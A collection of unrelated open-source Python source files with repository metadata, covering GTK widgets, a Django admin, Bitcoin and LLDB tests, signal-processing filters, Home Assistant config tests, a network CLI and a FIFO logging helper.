        choices = [(member.nick, member)
                   for member in enum_class
                   if not value_filter or member in value_filter]
        self.prefill(choices)
class ProxyWidgetMapping:
    # In PyGTK 2.4.0 the gtk.glade.XML type_dict parameter is buggy: a missing
    # name raises a *silent* KeyError that only surfaces later, whenever some
    # code happens to call PyErr_Occurred(). We therefore mimic the internal
    # lookup ourselves and fall back to the real GType on a miss, so
    # PyMapping_GetItemString never sees an error set.
    types = {'GtkCheckButton': ProxyCheckButton,
             'GtkComboBox': FProxyComboBox,
             'GtkEntry': ProxyEntry,
             'GtkRadioButton': ProxyRadioButton,
             'GtkSpinButton': ProxySpinButton}
    def __getitem__(self, name):
        # EAFP: single dict lookup, falling back to the GObject type registry.
        try:
            return self.types[name]
        except KeyError:
            return gobject.type_from_name(name)
|
ylatuya/Flumotion
|
flumotion/ui/fgtk.py
|
Python
|
gpl-2.0
| 2,667
|
from django.contrib import admin
from django.contrib.sites.models import RequestSite, Site
from django.utils.translation import ugettext_lazy as _
from registration.models import RegistrationProfile
@admin.register(RegistrationProfile)
class RegistrationAdmin(admin.ModelAdmin):
    """Admin for RegistrationProfile with bulk activate / resend actions."""
    actions = ['activate_users', 'resend_activation_email']
    list_display = ('user', 'activation_key_expired')
    raw_id_fields = ['user']
    search_fields = ('user__username', 'user__first_name', 'user__last_name')
    def activate_users(self, request, queryset):
        """
        Activates the selected users, if they are not already
        activated.
        """
        for profile in queryset:
            RegistrationProfile.objects.activate_user(profile.activation_key)
    activate_users.short_description = _("Activate users")
    def resend_activation_email(self, request, queryset):
        """
        Re-sends activation emails for the selected users.
        Note that this will *only* send activation emails for users
        who are eligible to activate; emails will not be sent to users
        whose activation keys have expired or who have already
        activated.
        """
        # Prefer the configured Site; fall back to one built from the request.
        if Site._meta.installed:
            site = Site.objects.get_current()
        else:
            site = RequestSite(request)
        for profile in queryset:
            if not profile.activation_key_expired():
                profile.send_activation_email(site)
    resend_activation_email.short_description = _("Re-send activation emails")
|
awakeup/django-registration
|
registration/admin.py
|
Python
|
bsd-3-clause
| 1,544
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error
class DeprecatedRpcTest(BitcoinTestFramework):
    """Exercise -deprecatedrpc gating: node0 rejects, node1 (flagged) allows."""
    def set_test_params(self):
        self.num_nodes = 2
        self.setup_clean_chain = True
        # Only node1 re-enables the deprecated 'generate' RPC.
        self.extra_args = [[], ["-deprecatedrpc=generate"]]
    def skip_test_if_missing_module(self):
        # The generate RPC method requires the wallet to be compiled
        self.skip_if_no_wallet()
    def run_test(self):
        # This test should be used to verify correct behaviour of deprecated
        # RPC methods with and without the -deprecatedrpc flags. For example:
        #
        # self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
        # assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
        # self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
        self.log.info("Test generate RPC")
        assert_raises_rpc_error(-32, 'The wallet generate rpc method is deprecated', self.nodes[0].rpc.generate, 1)
        self.nodes[1].generate(1)
if __name__ == '__main__':
    DeprecatedRpcTest().main()
|
chaincoin/chaincoin
|
test/functional/rpc_deprecated.py
|
Python
|
mit
| 1,464
|
import pytest
import psi4
from forte.solvers import solver_factory, HF, ActiveSpaceSolver, SpinAnalysis
def test_aci_3():
    """Test FCI on H4/STO-3G. Reproduces the test aci-1"""
    # Reference values the computed energies must reproduce.
    ref_hf_energy = -2.0310813811962456
    ref_aci_energy = -2.115455548674
    ref_acipt2_energy = -2.116454734743
    spin_val = 1.02027340
    # setup job
    xyz = """
    H -0.4 0.0 0.0
    H 0.4 0.0 0.0
    H 0.1 -0.3 1.0
    H -0.1 0.5 1.0
    """
    input = solver_factory(molecule=xyz, basis='cc-pVDZ')
    state = input.state(charge=0, multiplicity=1, sym='a')
    hf = HF(input, state=state, e_convergence=1.0e-12, d_convergence=1.0e-6)
    # ACI-specific options: sigma controls the selection threshold; batching
    # settings exercise the BATCH_HASH screening path.
    options = {
        'sigma': 0.001,
        'active_ref_type': 'hf',
        'diag_algorithm': 'SPARSE',
        'active_guess_size': 300,
        'aci_screen_alg': 'BATCH_HASH',
        'aci_nbatch': 2
    }
    aci = ActiveSpaceSolver(hf, type='ACI', states=state, e_convergence=1.0e-11, r_convergence=1.0e-7, options=options)
    spin = SpinAnalysis(aci, options={'SPIN_TEST': True})
    spin.run()
    # check results
    assert hf.value('hf energy') == pytest.approx(ref_hf_energy, 1.0e-10)
    assert aci.value('active space energy')[state] == pytest.approx([ref_aci_energy], 1.0e-9)
    assert psi4.core.variable("ACI+PT2 ENERGY") == pytest.approx(ref_acipt2_energy, 1.0e-8)
    assert psi4.core.variable("SPIN CORRELATION TEST") == pytest.approx(spin_val, 1.0e-7)
if __name__ == "__main__":
    test_aci_3()
|
evangelistalab/forte
|
tests/pytest-methods/aci/test_aci-3.py
|
Python
|
lgpl-3.0
| 1,464
|
__author__ = 'aloriga'
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
#import pickle
from utils import SerializableObject
def plot_result(data, output=None):
    """
    Plot raw *data* and, when provided, the filtered *output* on one figure.
    :param data: array of raw samples
    :param output: optional array of filtered samples
    """
    plt.subplot(2, 1, 2)
    plt.plot(data, 'b-', label='data')
    if output is not None:
        plt.plot(output, 'g-', linewidth=2, label='filtered data')
    plt.grid()
    plt.legend()
    plt.subplots_adjust(hspace=0.35)
    plt.show()
# Abstract class to create digital filters with a common interface
# All parameters should be passed via kwargs
class DigitalFilter(SerializableObject):
def __init__(self, **kwargs):
self.order = kwargs.get('order', 1)
self.start = kwargs.get('start', 0)
self.end = kwargs.get('end', 0)
self.filter_type = kwargs.get('filter_type', None)
self.fs = kwargs.get('fs', 1)
self.rp = kwargs.get('rp', 1)
self.rs = kwargs.get('rs', 1)
self.kernel_size = kwargs.get('kernel_size', 0)
self.no_nyq = kwargs.get('no_nyq', False)
self.description = 'Digital Filter'
self.num, self.den = self.create_filter()
def create_filter(self):
"""
Create filter
:return: tuple (numerator, denominator)
"""
return 0, 1
def apply(self, data):
"""
Apply filter to data
:param data: array to apply the filter
:return: array with new values
"""
return signal.lfilter(self.num, self.den, data)
def apply_forward_backward(self, data):
"""
Apply filter to data with forward-backward filter
:param data: array to apply the filter
:return: array with new values
"""
return signal.filtfilt(self.num, self.den, data)
def compute_freq_response(self):
return signal.freqz(self.num, self.den)
# Plot the response in frequency
def plot(self, print_phase=False):
"""
Plot the frequency response of the DigitalFilter
:param print_phase: boolean, if true phase response is plotted
:return:
"""
w, h = self.compute_freq_response()
fig = plt.figure()
plt.title('Digital filter frequency response')
ax1 = fig.add_subplot(111)
plt.plot(w, 20 * np.log10(abs(h)), 'b')
plt.ylim([-150, 10])
plt.ylabel('Amplitude [dB]', color='b')
plt.xlabel('Frequency [rad/sample]')
# plot lines -40dB
h_ref = np.array([100 for i in h])
plt.plot(w, -20 * np.log10(abs(h_ref)), 'r')
if print_phase:
ax2 = ax1.twinx()
angles = np.unwrap(np.angle(h))
plt.plot(w, angles, 'g')
plt.ylabel('Angle (radians)', color='g')
plt.grid()
plt.axis('tight')
plt.show()
# FILTERS DESIGN
# Common IIR Filters
class EllipticLow(DigitalFilter):
    def create_filter(self):
        """Design an elliptic low-pass filter with cutoff ``start``."""
        self.description = 'Elliptinc Low Pass Filter:' + str(self.start)
        self.filter_type = 'lowpass'
        # Cutoff is normalised to the Nyquist frequency unless no_nyq is set.
        cutoff = self.start if self.no_nyq else self.start / (0.5 * self.fs)
        return signal.ellip(self.order, self.rp, self.rs, cutoff, self.filter_type)
class EllipticHigh(DigitalFilter):
    def create_filter(self):
        """Design an elliptic high-pass filter with cutoff ``end``."""
        self.description = 'Elliptinc High Pass Filter:' + str(self.end)
        self.filter_type = 'highpass'
        # Cutoff is normalised to the Nyquist frequency unless no_nyq is set.
        cutoff = self.end if self.no_nyq else self.end / (0.5 * self.fs)
        return signal.ellip(self.order, self.rp, self.rs, cutoff, self.filter_type)
class EllipticBandPass(DigitalFilter):
    def create_filter(self):
        """Design an elliptic band-pass filter over [start, end]."""
        self.description = 'Elliptic Band Pass Filter:' + str(self.start) + '-' + str(self.end)
        self.filter_type = 'bandpass'
        # Both edges are normalised to the Nyquist frequency unless no_nyq.
        if self.no_nyq:
            band = (self.start, self.end)
        else:
            nyquist = 0.5 * self.fs
            band = (self.start / nyquist, self.end / nyquist)
        return signal.ellip(self.order, self.rp, self.rs, band, self.filter_type)
class MedianFilter(DigitalFilter):
    def apply(self, data):
        """Median-filter *data*, honouring kernel_size when it is set."""
        kwargs = {'kernel_size': self.kernel_size} if self.kernel_size else {}
        return signal.medfilt(data, **kwargs)
class ButterworthLow(DigitalFilter):
    def create_filter(self):
        """Design a Butterworth low-pass filter with cutoff ``start``."""
        self.description = 'Butterworth Low Pass Filter:' + str(self.start)
        self.filter_type = 'lowpass'
        # Cutoff is normalised to the Nyquist frequency unless no_nyq is set.
        cutoff = self.start if self.no_nyq else self.start / (0.5 * self.fs)
        return signal.butter(self.order, cutoff, self.filter_type)
class ButterworthHigh(DigitalFilter):
    def create_filter(self):
        """Design a Butterworth high-pass filter with cutoff ``end``."""
        self.description = 'Butterworth High Pass Filter:' + str(self.end)
        self.filter_type = 'highpass'
        # Cutoff is normalised to the Nyquist frequency unless no_nyq is set.
        cutoff = self.end if self.no_nyq else self.end / (0.5 * self.fs)
        return signal.butter(self.order, cutoff, self.filter_type)
class ButterworthBandPass(DigitalFilter):
    def create_filter(self):
        """Design a Butterworth band-pass filter over [start, end]."""
        self.description = 'Butterworth Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
        self.filter_type = 'bandpass'
        # Both edges are normalised to the Nyquist frequency unless no_nyq.
        if self.no_nyq:
            band = (self.start, self.end)
        else:
            nyquist = 0.5 * self.fs
            band = (self.start / nyquist, self.end / nyquist)
        return signal.butter(self.order, band, self.filter_type)
class ChebyshevBandPass(DigitalFilter):
    def create_filter(self):
        """Design a Chebyshev type-I band-pass filter over [start, end]."""
        self.description = 'Chebyshev Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
        self.filter_type = 'bandpass'
        # Both edges are normalised to the Nyquist frequency unless no_nyq.
        if self.no_nyq:
            band = (self.start, self.end)
        else:
            nyquist = 0.5 * self.fs
            band = (self.start / nyquist, self.end / nyquist)
        return signal.cheby1(self.order, self.rp, band, self.filter_type)
# FIR Filters
class FIRLowPassFilter(DigitalFilter):
    def create_filter(self):
        """Design a windowed-sinc FIR low-pass filter with cutoff ``start``."""
        self.description = 'FIR Low Pass Filter: ' + str(self.start)
        self.filter_type = 'bandpass'
        cutoff = self.start / (0.5 * self.fs)
        # order+1 taps; an FIR filter has a unit denominator.
        return signal.firwin(self.order + 1, cutoff), [1.0]
class FIRHighPassFilter(DigitalFilter):
    def create_filter(self):
        """Design a windowed-sinc FIR high-pass filter with cutoff ``end``."""
        self.description = 'FIR High Pass Filter: ' + str(self.end)
        self.filter_type = 'bandpass'
        cutoff = self.end / (0.5 * self.fs)
        # pass_zero=False makes firwin reject DC, i.e. a high-pass design.
        return signal.firwin(self.order + 1, cutoff, pass_zero=False), [1.0]
class FIRBandPassFilter(DigitalFilter):
    def create_filter(self):
        """Design a windowed-sinc FIR band-pass filter over [start, end]."""
        self.description = 'FIR Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
        self.filter_type = 'bandpass'
        nyquist = 0.5 * self.fs
        band = [self.start / nyquist, self.end / nyquist]
        # pass_zero=False turns the two edges into a band-pass response.
        return signal.firwin(self.order + 1, band, pass_zero=False), [1.0]
# MULTIRATE FILTER BANK
# MULTIRATE FILTER BANK (Python 2 module: print statements, builtin reduce)
class FilterBank(SerializableObject):
    def __init__(self, filters, sampling_fs=44100):
        """
        :param filters: dictionary, key: filter name, value: DigitalFilter
        :param sampling_fs: sampling frequency
        :return:
        """
        # check if filters are DigitalFilter objects
        assert reduce(lambda x, y: x and y, [isinstance(filters[f], DigitalFilter) for f in filters])
        self.filters = filters
        self.sampling_fs = sampling_fs
    def apply(self, initial_data, resample=False):
        """
        Apply all filters to data
        :param initial_data: array to apply the filter
        :param resample: boolean, if True resample method is applied. See multi-rate filtering
        :return: data processed
        """
        return self._apply_function(initial_data, resample, 'apply')
    def apply_forward_backward(self, initial_data, resample=False):
        """
        Apply all filters to data with backward-forward method
        :param initial_data: array to apply the filter
        :param resample: boolean, if True resample method is applied. See multi-rate filtering
        :return: data processed
        """
        return self._apply_function(initial_data, resample, 'apply_forward_backward')
    def _apply_function(self, initial_data, resample, function):
        # Run every filter at its own rate: decimate the input down to the
        # filter's fs, apply, normalise, optionally resample back up.
        output = {}
        output_resampled = {}
        nan_errors = []
        for f in self.filters:
            # NOTE(review): integer division under Python 2; decimate expects
            # an int factor, so sampling_fs is presumed a multiple of fs.
            decimate_factor = self.sampling_fs/self.filters[f].fs
            data = signal.decimate(initial_data, decimate_factor)
            # apply function
            output[f] = getattr(self.filters[f], function)(data)
            # normalize output to its own peak value
            output[f] = output[f]/max(output[f])
            if resample:
                # resample with FFT, it can be slow!
                output_resampled[f] = signal.resample(output[f], len(initial_data))
            if np.isnan(output[f]).any():
                print f
                nan_errors.append(f)
        # Any NaN output invalidates the whole bank run.
        if nan_errors:
            print 'Error Occurred: filters return NAN', nan_errors
            return {}
        else:
            print 'DONE!'
            return output_resampled if resample else output
|
neural22/scipy-audio-interface
|
digital_filter.py
|
Python
|
gpl-2.0
| 9,987
|
"""
Test that we work properly with classes with the trivial_abi attribute
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestTrivialABI(TestBase):
    """Check variable printing and expression calls for trivial_abi classes."""
    mydir = TestBase.compute_mydir(__file__)
    NO_DEBUG_INFO_TESTCASE = True
    @skipUnlessSupportedTypeAttribute("trivial_abi")
    @expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr37995")
    @expectedFailureAll(archs=["aarch64"], oslist=["linux"],
                        bugnumber="llvm.org/pr44161")
    def test_call_trivial(self):
        """Test that we can print a variable & call a function with a trivial ABI class."""
        self.build()
        self.main_source_file = lldb.SBFileSpec("main.cpp")
        self.expr_test(True)
    @skipUnlessSupportedTypeAttribute("trivial_abi")
    # fixed for SysV-x86_64 ABI, but not Windows-x86_64
    @expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr36870")
    @expectedFailureAll(archs=["aarch64"], oslist=["linux"],
                        bugnumber="llvm.org/pr44161")
    @expectedFailureAll(archs=["arm64", "arm64e"], bugnumber="<rdar://problem/57844240>")
    def test_call_nontrivial(self):
        """Test that we can print a variable & call a function on the same class w/o the trivial ABI marker."""
        self.build()
        self.main_source_file = lldb.SBFileSpec("main.cpp")
        self.expr_test(False)
    def check_value(self, test_var, ivar_value):
        # Validate the SBValue and confirm its 'ivar' member holds ivar_value.
        self.assertTrue(test_var.GetError().Success(), "Invalid valobj: %s"%(test_var.GetError().GetCString()))
        ivar = test_var.GetChildMemberWithName("ivar")
        self.assertTrue(test_var.GetError().Success(), "Failed to fetch ivar")
        self.assertEqual(ivar_value, ivar.GetValueAsSigned(), "Got the right value for ivar")
    def check_frame(self, thread):
        # Inspect inVal via frame variable and via expression, then step out
        # and check the function's return value.
        frame = thread.frames[0]
        inVal_var = frame.FindVariable("inVal")
        self.check_value(inVal_var, 10)
        options = lldb.SBExpressionOptions()
        inVal_expr = frame.EvaluateExpression("inVal", options)
        self.check_value(inVal_expr, 10)
        thread.StepOut()
        outVal_ret = thread.GetStopReturnValue()
        self.check_value(outVal_ret, 30)
    def expr_test(self, trivial):
        (target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
                                   "Set a breakpoint here", self.main_source_file)
        # Stop in a function that takes a trivial value, and try both frame var & expr to get its value:
        if trivial:
            self.check_frame(thread)
            return
        # Now continue to the same thing without the trivial_abi and see if we get that right:
        threads = lldbutil.continue_to_breakpoint(process, bkpt)
        self.assertEqual(len(threads), 1, "Hit my breakpoint the second time.")
        self.check_frame(threads[0])
|
endlessm/chromium-browser
|
third_party/llvm/lldb/test/API/lang/cpp/trivial_abi/TestTrivialABI.py
|
Python
|
bsd-3-clause
| 2,923
|
"""Test hassbian config."""
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.const import CONF_UNIT_SYSTEM, CONF_UNIT_SYSTEM_IMPERIAL
from homeassistant.util import dt as dt_util, location
from tests.async_mock import patch
# Remember the process-wide default zone so tests that change it can restore it.
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
async def client(hass, hass_ws_client):
    """Fixture that can interact with the config manager API."""
    # Restrict the config integration to the "core" panel for these tests.
    with patch.object(config, "SECTIONS", ["core"]):
        assert await async_setup_component(hass, "config", {})
    return await hass_ws_client(hass)
async def test_validate_config_ok(hass, hass_client):
    """Test checking config via the REST check_config endpoint."""
    with patch.object(config, "SECTIONS", ["core"]):
        await async_setup_component(hass, "config", {})
    client = await hass_client()
    # A None result from the checker means the configuration is valid.
    with patch(
        "homeassistant.components.config.core.async_check_ha_config_file",
        return_value=None,
    ):
        resp = await client.post("/api/config/core/check_config")
    assert resp.status == 200
    result = await resp.json()
    assert result["result"] == "valid"
    assert result["errors"] is None
    # A string result is the error text and marks the config invalid.
    with patch(
        "homeassistant.components.config.core.async_check_ha_config_file",
        return_value="beer",
    ):
        resp = await client.post("/api/config/core/check_config")
    assert resp.status == 200
    result = await resp.json()
    assert result["result"] == "invalid"
    assert result["errors"] == "beer"
async def test_websocket_core_update(hass, client):
    """Test core config update websocket command."""
    # Preconditions: none of the values we are about to set are in place yet.
    assert hass.config.latitude != 60
    assert hass.config.longitude != 50
    assert hass.config.elevation != 25
    assert hass.config.location_name != "Huis"
    assert hass.config.units.name != CONF_UNIT_SYSTEM_IMPERIAL
    assert hass.config.time_zone.zone != "America/New_York"
    assert hass.config.external_url != "https://www.example.com"
    assert hass.config.internal_url != "http://example.com"
    await client.send_json(
        {
            "id": 5,
            "type": "config/core/update",
            "latitude": 60,
            "longitude": 50,
            "elevation": 25,
            "location_name": "Huis",
            CONF_UNIT_SYSTEM: CONF_UNIT_SYSTEM_IMPERIAL,
            "time_zone": "America/New_York",
            "external_url": "https://www.example.com",
            "internal_url": "http://example.local",
        }
    )
    msg = await client.receive_json()
    assert msg["id"] == 5
    assert msg["type"] == TYPE_RESULT
    assert msg["success"]
    # Every field from the command must now be reflected in hass.config.
    assert hass.config.latitude == 60
    assert hass.config.longitude == 50
    assert hass.config.elevation == 25
    assert hass.config.location_name == "Huis"
    assert hass.config.units.name == CONF_UNIT_SYSTEM_IMPERIAL
    assert hass.config.time_zone.zone == "America/New_York"
    assert hass.config.external_url == "https://www.example.com"
    assert hass.config.internal_url == "http://example.local"
    # Restore the global default time zone for subsequent tests.
    dt_util.set_default_time_zone(ORIG_TIME_ZONE)
async def test_websocket_core_update_not_admin(hass, hass_ws_client, hass_admin_user):
    """Test core config fails for non admin."""
    # Strip the admin group so the command runs into the authorization check.
    hass_admin_user.groups = []
    with patch.object(config, "SECTIONS", ["core"]):
        await async_setup_component(hass, "config", {})

    client = await hass_ws_client(hass)
    await client.send_json({"id": 6, "type": "config/core/update", "latitude": 23})

    msg = await client.receive_json()

    assert msg["id"] == 6
    assert msg["type"] == TYPE_RESULT
    assert not msg["success"]
    assert msg["error"]["code"] == "unauthorized"
async def test_websocket_bad_core_update(hass, client):
    """Test core config update fails with bad parameters."""
    # "latituude" is deliberately misspelled to trigger schema validation.
    await client.send_json({"id": 7, "type": "config/core/update", "latituude": 23})

    msg = await client.receive_json()

    assert msg["id"] == 7
    assert msg["type"] == TYPE_RESULT
    assert not msg["success"]
    assert msg["error"]["code"] == "invalid_format"
async def test_detect_config(hass, client):
    """Test detect config."""
    with patch(
        "homeassistant.util.location.async_detect_location_info", return_value=None,
    ):
        await client.send_json({"id": 1, "type": "config/core/detect"})
        msg = await client.receive_json()

    assert msg["success"] is True
    # When no location info could be detected, the suggestion payload is empty.
    assert msg["result"] == {}
async def test_detect_config_fail(hass, client):
    """Test detect config."""
    # LocationInfo with only unit system and time zone populated: the
    # command should surface exactly those two detected fields.
    with patch(
        "homeassistant.util.location.async_detect_location_info",
        return_value=location.LocationInfo(
            ip=None,
            country_code=None,
            country_name=None,
            region_code=None,
            region_name=None,
            city=None,
            zip_code=None,
            latitude=None,
            longitude=None,
            use_metric=True,
            time_zone="Europe/Amsterdam",
        ),
    ):
        await client.send_json({"id": 1, "type": "config/core/detect"})
        msg = await client.receive_json()

    assert msg["success"] is True
    assert msg["result"] == {"unit_system": "metric", "time_zone": "Europe/Amsterdam"}
|
nkgilley/home-assistant
|
tests/components/config/test_core.py
|
Python
|
apache-2.0
| 5,282
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AzureAsyncOperationResult(Model):
    """The response body contains the status of the specified asynchronous
    operation, indicating whether it has succeeded, is in progress, or has
    failed. Note that this status is distinct from the HTTP status code
    returned for the Get Operation Status operation itself. If the asynchronous
    operation succeeded, the response body includes the HTTP status code for
    the successful request. If the asynchronous operation failed, the response
    body includes the HTTP status code for the failed request and error
    information regarding the failure.

    :param status: Status of the Azure async operation. Possible values are:
     'InProgress', 'Succeeded', and 'Failed'. Possible values include:
     'InProgress', 'Succeeded', 'Failed'
    :type status: str or :class:`NetworkOperationStatus
     <azure.mgmt.network.models.NetworkOperationStatus>`
    :param error:
    :type error: :class:`Error <azure.mgmt.network.models.Error>`
    """

    # Maps attribute names to their wire-format keys and msrest types.
    _attribute_map = {
        'error': {'key': 'error', 'type': 'Error'},
        'status': {'key': 'status', 'type': 'str'},
    }

    def __init__(self, status=None, error=None):
        # Both fields are optional; unspecified ones stay None.
        self.error = error
        self.status = status
|
rjschwei/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/models/azure_async_operation_result.py
|
Python
|
mit
| 1,759
|
import sys
import gevent
from gevent import socket
import greentest
class Test(greentest.TestCase):
    # Verifies that a gevent socket recv() raises socket.error('timed out')
    # when the peer never sends anything within the configured timeout.

    def start(self):
        """Open a listening socket on an ephemeral port; accept in a greenlet."""
        self.server = socket.socket()
        self.server.bind(('127.0.0.1', 0))
        self.server.listen(1)
        # Port 0 above means "any free port"; read back the assigned one.
        self.server_port = self.server.getsockname()[1]
        self.acceptor = gevent.spawn(self.server.accept)

    def stop(self):
        """Tear down the server socket and the accepting greenlet."""
        self.server.close()
        self.acceptor.kill()
        del self.acceptor
        del self.server

    def test(self):
        self.start()
        try:
            sock = socket.socket()
            sock.connect(('127.0.0.1', self.server_port))
            try:
                sock.settimeout(0.1)
                try:
                    # The server never sends, so this must time out.
                    result = sock.recv(1024)
                    raise AssertionError('Expected timeout to be raised, instead recv() returned %r' % (result, ))
                except socket.error:
                    ex = sys.exc_info()[1]
                    self.assertEqual(ex.args, ('timed out',))
                    self.assertEqual(str(ex), 'timed out')
                    # NOTE: indexing an exception (ex[0]) only works on
                    # Python 2 -- this test targets the py2 gevent tree.
                    self.assertEqual(ex[0], 'timed out')
            finally:
                sock.close()
        finally:
            self.stop()
if __name__ == '__main__':
    # Run the gevent test harness when executed as a script.
    greentest.main()
|
mgadi/naemonbox
|
sources/psdash/gevent-1.0.1/greentest/test__socket_timeout.py
|
Python
|
gpl-2.0
| 1,258
|
from .generic import *
from .auth import *
|
st4lk/django-relish
|
relish/decorators/__init__.py
|
Python
|
bsd-3-clause
| 43
|
"""Commands related to networks are in this module"""
import click
import sys
from hil.cli.client_setup import client
@click.group()
def network():
    """Commands related to network"""
    # Click group only; subcommands are attached below via @network.command.
@network.command(name='create', short_help='Create a new network')
@click.argument('network')
@click.argument('owner')
@click.option('--access', help='Projects that can access this network. '
              'Defaults to the owner of the network')
@click.option('--net-id',
              help='Network ID for network. Only admins can specify this.')
def network_create(network, owner, access, net_id):
    """Create a link-layer <network>. See docs/networks.md for details"""
    # The HIL API expects explicit values, not None: an empty net_id means
    # "allocate one", and access defaults to the owning project.
    if net_id is None:
        net_id = ''
    if access is None:
        access = owner
    client.network.create(network, owner, access, net_id)
@network.command(name='delete')
@click.argument('network')
def network_delete(network):
    """Delete a network"""
    client.network.delete(network)
@network.command(name='show')
@click.argument('network')
def network_show(network):
    """Display information about network"""
    q = client.network.show(network)
    # q is a mapping of attribute name -> value; print one per line.
    for item in q.items():
        sys.stdout.write("%s\t : %s\n" % (item[0], item[1]))
@network.command(name='list')
def network_list():
    """List all networks"""
    q = client.network.list()
    # NOTE(review): the format string here ('%s \t : %s') differs slightly
    # from network_show's ('%s\t : %s'); kept as-is in case output is parsed.
    for item in q.items():
        sys.stdout.write('%s \t : %s\n' % (item[0], item[1]))
@network.command('list-attachments')
@click.argument('network')
@click.option('--project', help='Name of project.')
def list_network_attachments(network, project):
    """Lists all the attachments from <project> for <network>

    If <project> is `None`, lists all attachments for <network>
    """
    # Python 2 print statement -- this module targets Python 2.
    print client.network.list_network_attachments(network, project)
@network.command(name='grant-access')
@click.argument('network')
@click.argument('project')
def network_grant_project_access(project, network):
    """Add <project> to <network> access"""
    # Click binds arguments by parameter name, so the (project, network)
    # parameter order differing from the argument order is fine.
    client.network.grant_access(project, network)
@network.command(name='revoke-access')
@click.argument('network')
@click.argument('project')
def network_revoke_project_access(project, network):
    """Remove <project> from <network> access"""
    client.network.revoke_access(project, network)
|
SahilTikale/haas
|
hil/cli/network.py
|
Python
|
apache-2.0
| 2,277
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Utilities for testing the logging system (metrics, common logs)."""
import fcntl
import os
import sys
from queue import Queue
from threading import Thread
class Fifo:
    """Facility for creating and working with named pipes (FIFOs)."""

    # Filesystem path of the FIFO; used by __del__ for cleanup.
    path = None
    # Open file object wrapping the FIFO's read end.
    fifo = None

    def __init__(self, path, blocking=False):
        """Create a new named pipe."""
        if os.path.exists(path):
            raise FileExistsError("Named pipe {} already exists.".format(path))

        os.mkfifo(path)
        if not blocking:
            # O_NONBLOCK lets the open succeed without a writer attached.
            fd = os.open(path, os.O_NONBLOCK)
            self.fifo = os.fdopen(fd, "r")
        else:
            # Blocking open: waits here until a writer opens the pipe.
            self.fifo = open(path, "r", encoding='utf-8')
        self.path = path

    def sequential_reader(self, max_lines):
        """Return up to `max_lines` lines from a non blocking fifo.

        :return: A list containing the read lines.
        """
        return self.fifo.readlines()[:max_lines]

    @property
    def flags(self):
        """Return flags of the opened fifo.

        :return An integer with flags of the opened file.
        """
        fd = self.fifo.fileno()
        return fcntl.fcntl(fd, fcntl.F_GETFL)

    @flags.setter
    def flags(self, flags):
        """Set new flags for the opened fifo."""
        fd = self.fifo.fileno()
        fcntl.fcntl(fd, fcntl.F_SETFL, flags)

    def threaded_reader(self, check_func, *args):
        """Start a thread to read fifo.

        The thread that runs the `check_func` on each line
        in the FIFO and enqueues any exceptions in the `exceptions_queue`.
        """
        exceptions_queue = Queue()
        metric_reader_thread = Thread(
            target=self._do_thread_reader, args=(
                exceptions_queue,
                check_func,
                *args
            )
        )
        metric_reader_thread.start()
        return exceptions_queue

    def _do_thread_reader(self, exceptions_queue, check_func, *args):
        """Read from a FIFO opened as read-only.

        This applies a function for checking output on each
        line of the logs received.
        Failures and exceptions are propagated to the main thread
        through the `exceptions_queue`.
        """
        # Bounded loop so the reader thread cannot spin forever.
        max_iter = 20
        while max_iter > 0:
            data = self.fifo.readline()
            if not data:
                break
            try:
                check_func(
                    "{0}".format(data), *args
                )
            # pylint: disable=broad-except
            # We need to propagate all type of exceptions to the main thread.
            except Exception:
                exceptions_queue.put(sys.exc_info())
            max_iter = max_iter-1
        # Sentinel telling the consumer that reading has finished.
        exceptions_queue.put("Done")

    def __del__(self):
        """Destructor cleaning up the FIFO from where it was created."""
        if self.path:
            try:
                os.remove(self.path)
            except OSError:
                # Best effort: the pipe may already be gone.
                pass
|
firecracker-microvm/firecracker
|
tests/host_tools/logging.py
|
Python
|
apache-2.0
| 3,071
|
#!/usr/bin/python
"""
This file is part of the 'Elements' Project
Elements is a 2D Physics API for Python (supporting pybox2d)
Copyright (C) 2008, The Elements Team, <elements@linuxuser.at>
Home: http://elements.linuxuser.at
IRC: #elements on irc.freenode.org
Code: http://www.assembla.com/wiki/show/elements
svn co http://svn2.assembla.com/svn/elements
License: GPLv3 | See LICENSE for the full text
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = '0.11'
__contact__ = '<elements@linuxuser.at>'

# Load Box2D
# pybox2d is a hard dependency: abort with install hints if it is missing.
# (Python 2 module: print statements and bare except kept as-is.)
try:
    import Box2D as box2d
except:
    print 'Could not load the pybox2d library (Box2D).'
    print 'Please run "setup.py install" to install the dependencies.'
    print
    print 'Or recompile pybox2d for your system and python version.'
    print "See http://code.google.com/p/pybox2d"
